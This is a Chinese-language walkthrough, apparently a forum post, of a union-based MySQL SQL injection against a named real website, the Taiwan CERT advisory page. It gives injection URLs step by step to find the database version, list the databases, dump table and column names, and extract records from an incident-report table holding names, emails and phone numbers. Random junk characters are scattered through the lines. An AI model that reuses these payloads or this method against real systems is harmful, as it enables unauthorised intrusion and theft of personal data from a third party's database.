1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
8 j8 x' H* Z/ b4 e2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
/ J$ G2 p; F' k6 Z8 }http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--' P( w/ s8 U* t5 q6 \. e
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
6 j/ S) z* X3 P! l \1 N数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
( N; l' ~6 i' }- v- K# r4.判断有没有写权限- a9 G& p" V4 v9 a) V
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
$ p1 Q* H6 [3 ^9 f9 O. W6 E没办法,手动猜表啦" |& E( ]% c+ N5 a8 _' `
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1, C7 i- L2 c6 \, a9 _: C
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
; R5 B: p6 E# `- i6 @. {http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--+ [5 W0 r$ n1 T' [. u
成功查出所有数据库,国外的黑客就是不一般。数据库如下:$ p* i' K& [4 S) u$ A) I
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb. `2 `; z' B) s; b4 Y8 M' s+ ~
6.爆表,爆的是twcert库
' @% e. a# x! u& h) shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--# I9 V$ i( b) w: j
爆出如下表
1 q1 o3 ?8 D; k# o4 F/ vdownloadfile,irsys,newsdata,secrpt,secrpt_big5
3 w* \2 | Q: B/ o& Z4 Q7.爆列名,这次爆的是irsys表
- u0 ~8 G4 v0 l; z; d t" x' z( Ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
6 q) Z: u& e$ a0 m) W$ h O爆出如下列
% @) [8 [: T8 ^8 Y4 |ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
) s! N) I( P( C- M4 G8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。( p& g+ k6 T: c3 w$ Z7 q
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--6 c- j+ p0 t6 N/ S/ ?- \
返回是3,说明每个列里有3个地段
* v0 w0 R/ F E$ v9.爆字段内容/ s$ Y/ q, q6 ^4 L
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
- b/ q; ^6 J. }9 d* [$ E爆出name列的第一个字段的内容: [. I$ G& n9 ]/ X! W! n; v a
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
# E( d d7 U& K/ m% y" R8 d% J3 ^爆出name列的第二个字段的内容 |